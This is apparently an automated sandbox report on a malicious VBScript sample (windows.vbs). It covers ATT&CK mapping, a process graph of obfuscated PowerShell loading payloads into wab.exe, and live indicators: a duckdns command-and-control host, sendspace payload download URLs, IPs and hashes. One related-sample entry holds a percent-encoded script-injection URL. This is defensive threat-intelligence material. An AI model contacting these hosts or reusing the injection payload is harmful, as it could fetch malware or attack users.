              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information221
              Scripting              		Valid Accounts11
              Windows Management Instrumentation              		221
              Scripting              		111
              Process Injection              		1
              Masquerading              		OS Credential Dumping31
              Security Software Discovery              		Remote Services1
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts11
              Command and Scripting Interpreter              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		1
              Disable or Modify Tools              		LSASS Memory1
              Process Discovery              		Remote Desktop ProtocolData from Removable Media1
              Non-Standard Port              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Exploitation for Client Execution              		Logon Script (Windows)Logon Script (Windows)41
              Virtualization/Sandbox Evasion              		Security Account Manager41
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive1
              Ingress Tool Transfer              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell              		Login HookLogin Hook111
              Process Injection              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture2
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
              Obfuscated Files or Information              		LSA Secrets1
              File and Directory Discovery              		SSHKeylogging213
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Software Packing              		Cached Domain Credentials14
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1446635 Sample: windows.vbs Startdate: 23/05/2024 Architecture: WINDOWS Score: 100 28 rachesxwdavid.duckdns.org 2->28 30 www.sendspace.com 2->30 32 2 other IPs or domains 2->32 46 Snort IDS alert for network traffic 2->46 48 Found malware configuration 2->48 50 Malicious sample detected (through community Yara rule) 2->50 54 7 other signatures 2->54 9 wscript.exe 1 2->9         started        signatures3 52 Uses dynamic DNS services 28->52 process4 signatures5 56 VBScript performs obfuscated calls to suspicious functions 9->56 58 Suspicious powershell command line found 9->58 60 Wscript starts Powershell (via cmd or directly) 9->60 62 3 other signatures 9->62 12 powershell.exe 14 19 9->12         started        process6 dnsIp7 38 fs03n1.sendspace.com 69.31.136.17, 443, 49707 GTT-BACKBONEGTTDE United States 12->38 40 www.sendspace.com 172.67.170.105, 443, 49706, 49710 CLOUDFLARENETUS United States 12->40 64 Suspicious powershell command line found 12->64 66 Very long command line found 12->66 68 Found suspicious powershell code related to unpacking or dynamic code loading 12->68 16 powershell.exe 17 12->16         started        19 conhost.exe 12->19         started        21 cmd.exe 1 12->21         started        signatures8 process9 signatures10 42 Writes to foreign memory regions 16->42 44 Found suspicious powershell code related to unpacking or dynamic code loading 16->44 23 wab.exe 14 16->23         started        26 cmd.exe 1 16->26         started        process11 dnsIp12 34 rachesxwdavid.duckdns.org 57.128.155.22, 49713, 8895 ATGS-MMD-ASUS Belgium 23->34 36 fs13n5.sendspace.com 69.31.136.57, 443, 49711 GTT-BACKBONEGTTDE United States 23->36

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              windows.vbs8%ReversingLabsWin32.Trojan.Generic

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
              http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              http://crl.m0%URL Reputationsafe
              https://aka.ms/pscore6lB0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              https://aka.ms/pscore680%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              https://fs13n5.sendspace.com/Ezo80%Avira URL Cloudsafe
              http://fs03n1.sendspace.com0%Avira URL Cloudsafe
              https://www.sendspace.com/pro/dl/tbfvpdXR0%Avira URL Cloudsafe
              https://www.sendspace.com/pro/dl/dy1f160%Avira URL Cloudsafe
              https://fs13n5.sendspace.com/dlpro/44141c5e47f518aa141f08f91a6c6e36/664f6e12/dy1f16/yBKPKDHbe243.bin0%Avira URL Cloudsafe
              https://fs03n1.sendspace.com0%Avira URL Cloudsafe
              https://www.sendspace.com/pro/dl/tbfvpd0%Avira URL Cloudsafe
              http://www.sendspace.com0%Avira URL Cloudsafe
              https://fs13n5.sendspace.com/yz0%Avira URL Cloudsafe
              https://fs03n1.sendspace.comx0%Avira URL Cloudsafe
              https://github.com/Pester/Pester0%Avira URL Cloudsafe
              https://www.sendspace.com/pro/dl/tbfvpdP0%Avira URL Cloudsafe
              https://www.sendspace.com/0%Avira URL Cloudsafe
              rachesxwdavid.duckdns.org100%Avira URL Cloudmalware
              https://www.sendspace.com0%Avira URL Cloudsafe
              https://fs03n1.sendspace.com/dlpro/85796124f5e308d921827e38e402c0c9/664f6de7/tbfvpd/Parnorpine.java0%Avira URL Cloudsafe
              https://fs13n5.sendspace.com/om:443t0%Avira URL Cloudsafe
              https://fs13n5.sendspace.com/0%Avira URL Cloudsafe
              https://www.sendspace.com/pro/dl/dy1f16/u280%Avira URL Cloudsafe
              https://fs03n1.sendspaX0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              www.sendspace.com
              		172.67.170.105
              		truefalse
                		unknown
                fs03n1.sendspace.com
                		69.31.136.17
                		truefalse
                  		unknown
                  fs13n5.sendspace.com
                  		69.31.136.57
                  		truefalse
                    		unknown
                    rachesxwdavid.duckdns.org
                    		57.128.155.22
                    		truetrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://www.sendspace.com/pro/dl/dy1f16false
                      • Avira URL Cloud: safe
                      		unknown
                      https://www.sendspace.com/pro/dl/tbfvpdfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://fs13n5.sendspace.com/dlpro/44141c5e47f518aa141f08f91a6c6e36/664f6e12/dy1f16/yBKPKDHbe243.binfalse
                      • Avira URL Cloud: safe
                      		unknown
                      rachesxwdavid.duckdns.orgtrue
                      • Avira URL Cloud: malware
                      		unknown
                      https://fs03n1.sendspace.com/dlpro/85796124f5e308d921827e38e402c0c9/664f6de7/tbfvpd/Parnorpine.javafalse
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://nuget.org/NuGet.exepowershell.exe, 00000009.00000002.2000635803.0000012C90073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1843333872.00000000055F8000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://fs13n5.sendspace.com/Ezo8wab.exe, 00000011.00000003.1826875899.00000000062E1000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000D.00000002.1840940042.00000000046E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1840251911.0000000000AD3000.00000004.00000020.00020000.00000000.sdmptrue
                      • URL Reputation: malware
                      		unknown
                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000D.00000002.1840940042.00000000046E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1840251911.0000000000AD3000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://fs03n1.sendspace.compowershell.exe, 00000009.00000002.1912177554.0000012C82213000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://www.sendspace.com/pro/dl/tbfvpdXRpowershell.exe, 0000000D.00000002.1840940042.00000000046E8000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://go.micropowershell.exe, 00000009.00000002.1912177554.0000012C8154F000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://contoso.com/Licensepowershell.exe, 0000000D.00000002.1843333872.00000000055F8000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://contoso.com/Iconpowershell.exe, 0000000D.00000002.1843333872.00000000055F8000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://fs13n5.sendspace.com/yzwab.exe, 00000011.00000003.1826875899.00000000062E1000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://fs03n1.sendspace.comxpowershell.exe, 00000009.00000002.1912177554.0000012C8053E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://fs03n1.sendspace.compowershell.exe, 00000009.00000002.1912177554.0000012C82226000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.sendspace.compowershell.exe, 00000009.00000002.1912177554.0000012C821EF000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.com/Pester/Pesterpowershell.exe, 0000000D.00000002.1840940042.00000000046E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1840251911.0000000000AD3000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://www.sendspace.compowershell.exe, 00000009.00000002.1912177554.0000012C8203C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1912177554.0000012C80227000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://www.sendspace.com/wab.exe, 00000011.00000002.2582688527.000000000629C000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://crl.mpowershell.exe, 0000000D.00000002.1845952673.000000000706B000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.sendspace.com/pro/dl/tbfvpdPpowershell.exe, 00000009.00000002.1912177554.0000012C80227000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://aka.ms/pscore6lBpowershell.exe, 0000000D.00000002.1840940042.0000000004591000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://contoso.com/powershell.exe, 0000000D.00000002.1843333872.00000000055F8000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://nuget.org/nuget.exepowershell.exe, 00000009.00000002.2000635803.0000012C90073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1843333872.00000000055F8000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://aka.ms/pscore68powershell.exe, 00000009.00000002.1912177554.0000012C80001000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://fs13n5.sendspace.com/om:443twab.exe, 00000011.00000003.1826875899.00000000062E1000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000009.00000002.1912177554.0000012C80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1840940042.0000000004591000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000011.00000002.2595172654.0000000021D41000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.sendspace.com/pro/dl/dy1f16/u28wab.exe, 00000011.00000003.1826875899.00000000062E1000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://fs03n1.sendspaXpowershell.exe, 00000009.00000002.1912177554.0000012C82213000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://fs13n5.sendspace.com/wab.exe, 00000011.00000003.1839864776.00000000062E1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000011.00000003.1826875899.00000000062E1000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      57.128.155.22
                      		rachesxwdavid.duckdns.orgBelgium
                      		2686ATGS-MMD-ASUStrue
                      69.31.136.17
                      		fs03n1.sendspace.comUnited States
                      		3257GTT-BACKBONEGTTDEfalse
                      172.67.170.105
                      		www.sendspace.comUnited States
                      		13335CLOUDFLARENETUSfalse
                      69.31.136.57
                      		fs13n5.sendspace.comUnited States
                      		3257GTT-BACKBONEGTTDEfalse

                      General Information

                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1446635
                      Start date and time:2024-05-23 18:24:12 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 7m 59s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:22
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:windows.vbs
                      Detection:MAL
                      Classification:mal100.troj.expl.evad.winVBS@12/7@4/4
                      EGA Information:
                      • Successful, ratio: 33.3%
                      HCA Information:
                      • Successful, ratio: 91%
                      • Number of executed functions: 78
                      • Number of non-executed functions: 3
                      Cookbook Comments:
                      • Found application associated with file extension: .vbs

                      Warnings

                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 93.184.221.240
                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com
                      • Execution Graph export aborted for target powershell.exe, PID 7308 because it is empty
                      • Execution Graph export aborted for target powershell.exe, PID 7588 because it is empty
                      • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size getting too big, too many NtCreateKey calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • VT rate limit hit for: windows.vbs

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      12:25:08API Interceptor17384x Sleep call for process: powershell.exe modified
                      12:25:58API Interceptor349940x Sleep call for process: wab.exe modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      57.128.155.22fresh_shrunk.exeGet hashmaliciousXWormBrowse
                        8QpxBYQvg1.exeGet hashmaliciousPureLog StealerBrowse
                          file.exeGet hashmaliciousGlupteba, Petite Virus, Raccoon Stealer v2, RedLine, SmokeLoader, Socks5SystemzBrowse
                            file.exeGet hashmaliciousGlupteba, Petite Virus, Raccoon Stealer v2, RedLine, SmokeLoader, Socks5SystemzBrowse
                              file.exeGet hashmaliciousRedLineBrowse
                                CHZlSQKW3X.exeGet hashmaliciousGlupteba, LummaC Stealer, Petite Virus, Raccoon Stealer v2, RedLine, SmokeLoader, zgRATBrowse
                                  IkYqsQV4ty.exeGet hashmaliciousGlupteba, LummaC Stealer, Petite Virus, Raccoon Stealer v2, RedLine, SmokeLoader, Socks5SystemzBrowse
                                    51lz9Xlo4S.exeGet hashmaliciousGlupteba, LummaC Stealer, Petite Virus, Raccoon Stealer v2, RedLine, SmokeLoader, Socks5SystemzBrowse
                                      AkJ6Em8xAv.exeGet hashmaliciousGlupteba, LummaC Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, zgRATBrowse
                                        vxBrm6K24y.exeGet hashmaliciousGlupteba, LummaC Stealer, Petite Virus, Raccoon Stealer v2, RedLine, SmokeLoader, zgRATBrowse
                                          69.31.136.17update.vbsGet hashmaliciousGuLoaderBrowse
                                            DOCUMENTS.exe.htmlGet hashmaliciousUnknownBrowse
                                              JAN_YDHM007390.vbsGet hashmaliciousUnknownBrowse
                                                UGH82MSGHWUSHSDHWQOL.vbsGet hashmaliciousUnknownBrowse
                                                  1st_Payment.vbsGet hashmaliciousRevengeBrowse
                                                    172.67.170.105time.vbsGet hashmaliciousGuLoaderBrowse
                                                      file300un.exeGet hashmaliciousGlupteba, Mars Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                        69.31.136.57update.vbsGet hashmaliciousGuLoaderBrowse
                                                          time.vbsGet hashmaliciousGuLoaderBrowse
                                                            https://www.sendspace.com/file/dwfkjzGet hashmaliciousFormBookBrowse
                                                              #W002UHNSOP.vbsGet hashmaliciousUnknownBrowse
                                                                1st_Payment_Copy.vbsGet hashmaliciousUnknownBrowse
                                                                  1st_Payment.vbsGet hashmaliciousRevengeBrowse
                                                                    QWMSA_Payment_Invoice0939.vbsGet hashmaliciousQuasarBrowse
                                                                      QA6433_#002.vbsGet hashmaliciousnjRatBrowse

                                                                        Domains

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        www.sendspace.comtime.vbsGet hashmaliciousGuLoaderBrowse
                                                                        • 172.67.170.105
                                                                        https://www.sendspace.com/pro/dl/hg4kq5Get hashmaliciousUnknownBrowse
                                                                        • 172.64.104.11
                                                                        RFQ_#_1045981_-_MAA_D_Plant_Project_r01.exe.htmlGet hashmaliciousUnknownBrowse
                                                                        • 172.67.161.115
                                                                        https://www.sendspace.com/file/dwfkjzGet hashmaliciousFormBookBrowse
                                                                        • 104.21.91.185
                                                                        DOCUMENTS.exe.htmlGet hashmaliciousUnknownBrowse
                                                                        • 172.64.202.8
                                                                        SecuriteInfo.com.Trojan.KillProc2.9731.8373.22974.exeGet hashmaliciousGuLoaderBrowse
                                                                        • 172.64.108.22
                                                                        RdMr3o5vB2.exeGet hashmaliciousCryptOne, Djvu, Raccoon Stealer v2, SmokeLoader, SocelarsBrowse
                                                                        • 172.67.141.102
                                                                        New Order.exeGet hashmaliciousOski Stealer VidarBrowse
                                                                        • 172.67.141.102
                                                                        QzvyuYJlDX.exeGet hashmaliciousUnknownBrowse
                                                                        • 104.21.41.17
                                                                        XZ22CfAOCN.exeGet hashmaliciousRedLine SmokeLoader Tofsee VidarBrowse
                                                                        • 172.64.173.34
                                                                        fs13n5.sendspace.com1st_Payment.vbsGet hashmaliciousRevengeBrowse
                                                                        • 69.31.136.57

                                                                        ASNs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        CLOUDFLARENETUSupdate.vbsGet hashmaliciousGuLoaderBrowse
                                                                        • 104.21.28.80
                                                                        time.vbsGet hashmaliciousGuLoaderBrowse
                                                                        • 172.67.170.105
                                                                        windows.vbsGet hashmaliciousUnknownBrowse
                                                                        • 188.114.96.3
                                                                        https://neuraxpharm.eurosbiolab.eu/?__cf_chl_rt_tk=TES3LKGEhjH1G5Ym.iTFDxwaSWwxOocOm2ySKfq7pJU-1716481117-0.0.1.1-1621Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                        • 104.17.2.184
                                                                        http://0x00003.000375.64090/images.php?p=%31%30%30%35%32%30%30%30%30%36%33%39%22%3E%3C%2F%64%69%76%3E%3C%73%63%72%69%70%74%3E%77%69%6E%64%6F%77%5B%27%6C%6F%63%61%74%69%6F%6E%27%5D%5B%27%72%65%70%6C%61%63%65%27%5D%28%5B%27%68%74%74%70%73%3A%2F%2F%69%6D%70%75%74%65%6C%65%74%74%65%27%2C%20%27%72%2E%63%6F%6D%2F%30%2F%30%2F%30%2F%27%2C%20%27%39%65%36%37%33%38%30%34%63%65%35%37%37%30%32%34%33%32%63%30%65%31%66%65%33%61%63%33%35%38%39%62%27%2C%27/12/101/10542/964/156117/16845%27%5D%5B%27%6A%6F%69%6E%27%5D%28%27%27%29%29%2C%64%6F%63%75%6D%65%6E%74%5B%27%62%6F%64%79%27%5D%5B%27%73%74%79%6C%65%27%5D%5B%27%6F%70%61%63%69%74%79%27%5D%3D%30%78%30%3B%3C%2F%73%63%72%69%70%74%3EGet hashmaliciousPhisherBrowse
                                                                        • 188.114.96.3
                                                                        ELECTRONIC RECEIPT_Europait.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                        • 104.17.2.184
                                                                        30% Down Payment Slip.pdf_______________________________________________________.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 104.26.12.205
                                                                        ordinul de cotatie.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 172.67.74.152
                                                                        https://microsoftedge.microsoft.com/addons/detail/rocketreach-edge-extensio/ldjlhlheoidifojmfkjfijmdhlagakniGet hashmaliciousUnknownBrowse
                                                                        • 104.18.138.17
                                                                        PI_230524.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        • 104.26.12.205
                                                                        ATGS-MMD-ASUSClear.7zGet hashmaliciousUnknownBrowse
                                                                        • 34.160.144.191
                                                                        http://info.ipreo.com/Privacy-Policy.htmlGet hashmaliciousUnknownBrowse
                                                                        • 34.149.2.41
                                                                        AsrP4dFOgM.elfGet hashmaliciousMirai, MoobotBrowse
                                                                        • 48.57.70.11
                                                                        gJlGkncVHO.elfGet hashmaliciousMirai, MoobotBrowse
                                                                        • 57.208.217.43
                                                                        gm7Kudjyws.elfGet hashmaliciousGafgytBrowse
                                                                        • 57.56.43.154
                                                                        https://miempresaessaludable.theobjective.comGet hashmaliciousUnknownBrowse
                                                                        • 57.128.96.202
                                                                        6uBxa0vGQt.elfGet hashmaliciousGafgytBrowse
                                                                        • 33.90.14.151
                                                                        n8RoxsQ4om.elfGet hashmaliciousMiraiBrowse
                                                                        • 57.141.231.20
                                                                        Xi102MnZby.elfGet hashmaliciousMiraiBrowse
                                                                        • 48.85.179.246
                                                                        TYxryaQOKO.elfGet hashmaliciousMiraiBrowse
                                                                        • 48.178.171.26
                                                                        GTT-BACKBONEGTTDEupdate.vbsGet hashmaliciousGuLoaderBrowse
                                                                        • 69.31.136.57
                                                                        time.vbsGet hashmaliciousGuLoaderBrowse
                                                                        • 69.31.136.53
                                                                        http://rb.gy/pcwqseGet hashmaliciousUnknownBrowse
                                                                        • 69.167.127.106
                                                                        http://rb.gy/707sjfGet hashmaliciousUnknownBrowse
                                                                        • 69.167.127.106
                                                                        la.bot.arm6.elfGet hashmaliciousUnknownBrowse
                                                                        • 69.31.5.255
                                                                        TxXQ106ErI.elfGet hashmaliciousMiraiBrowse
                                                                        • 208.97.218.33
                                                                        81#Uff09.exeGet hashmaliciousUnknownBrowse
                                                                        • 23.62.176.141
                                                                        YCrL9vbZ3g.elfGet hashmaliciousMiraiBrowse
                                                                        • 212.222.82.254
                                                                        M88FIQFvyo.elfGet hashmaliciousMiraiBrowse
                                                                        • 74.199.145.209
                                                                        kuzen.vbsGet hashmaliciousUnknownBrowse
                                                                        • 23.62.176.141

                                                                        JA3 Fingerprints

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        3b5074b1b5d032e5620f69f9f700ff0eupdate.vbsGet hashmaliciousGuLoaderBrowse
                                                                        • 172.67.170.105
                                                                        • 69.31.136.17
                                                                        time.vbsGet hashmaliciousGuLoaderBrowse
                                                                        • 172.67.170.105
                                                                        • 69.31.136.17
                                                                        windows.vbsGet hashmaliciousUnknownBrowse
                                                                        • 172.67.170.105
                                                                        • 69.31.136.17
                                                                        https://assets-fra.mkt.dynamics.com/0cc4a623-6510-ef11-9f83-002248da15fa/digitalassets/standaloneforms/6e39a88b-9710-ef11-9f89-002248d9c773Get hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                                                                        • 172.67.170.105
                                                                        • 69.31.136.17
                                                                        30% Down Payment Slip.pdf_______________________________________________________.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 172.67.170.105
                                                                        • 69.31.136.17
                                                                        ordinul de cotatie.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 172.67.170.105
                                                                        • 69.31.136.17
                                                                        PI_230524.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        • 172.67.170.105
                                                                        • 69.31.136.17
                                                                        phish_alert_sp2_2.0.0.0-214.emlGet hashmaliciousUnknownBrowse
                                                                        • 172.67.170.105
                                                                        • 69.31.136.17
                                                                        https://mydhl.express.dhl$tracking_link/Get hashmaliciousUnknownBrowse
                                                                        • 172.67.170.105
                                                                        • 69.31.136.17
                                                                        https://github.com/ustaxes/UsTaxes/files/15378217/All.2023.Tax.Documents.zipGet hashmaliciousUnknownBrowse
                                                                        • 172.67.170.105
                                                                        • 69.31.136.17
                                                                        37f463bf4616ecd445d4a1937da06e19update.vbsGet hashmaliciousGuLoaderBrowse
                                                                        • 172.67.170.105
                                                                        • 69.31.136.57
                                                                        time.vbsGet hashmaliciousGuLoaderBrowse
                                                                        • 172.67.170.105
                                                                        • 69.31.136.57
                                                                        windows.vbsGet hashmaliciousUnknownBrowse
                                                                        • 172.67.170.105
                                                                        • 69.31.136.57
                                                                        PI_230524.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        • 172.67.170.105
                                                                        • 69.31.136.57
                                                                        doc023571961504.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        • 172.67.170.105
                                                                        • 69.31.136.57
                                                                        Clear.7zGet hashmaliciousUnknownBrowse
                                                                        • 172.67.170.105
                                                                        • 69.31.136.57
                                                                        SwiftCopy_23052024.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                        • 172.67.170.105
                                                                        • 69.31.136.57
                                                                        ShippingDoc_23052024.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                        • 172.67.170.105
                                                                        • 69.31.136.57
                                                                        rPurchaseOrderPO05232024.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        • 172.67.170.105
                                                                        • 69.31.136.57
                                                                        Forfaldendes253.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                        • 172.67.170.105
                                                                        • 69.31.136.57

                                                                        Dropped Files

                                                                        No context

                                                                        Created / dropped Files

                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:modified
                                                                        Size (bytes):11608
                                                                        Entropy (8bit):4.8908305915084105
                                                                        Encrypted:false
                                                                        SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9R:9rib4Z1VoGIpN6KQkj2qkjh4iUxsT6YP
                                                                        MD5:DD89E182EEC1B964E2EEFE5F8889DCD7
                                                                        SHA1:326A3754A1334C32056811411E0C5C96F8BFBBEE
                                                                        SHA-256:383ABA2B62EA69A1AA28F0522BCFB0A19F82B15FCC047105B952950FF8B52C63
                                                                        SHA-512:B9AFE64D8558860B0CB8BC0FA676008E74F983C4845895E5444DD776A42B584ECE0BB1612D8F97EE631B064F08CF5B2C7622D58A3EF8EF89D199F2ACAEFA8B52
                                                                        Malicious:false
                                                                        Reputation:moderate, very likely benign file
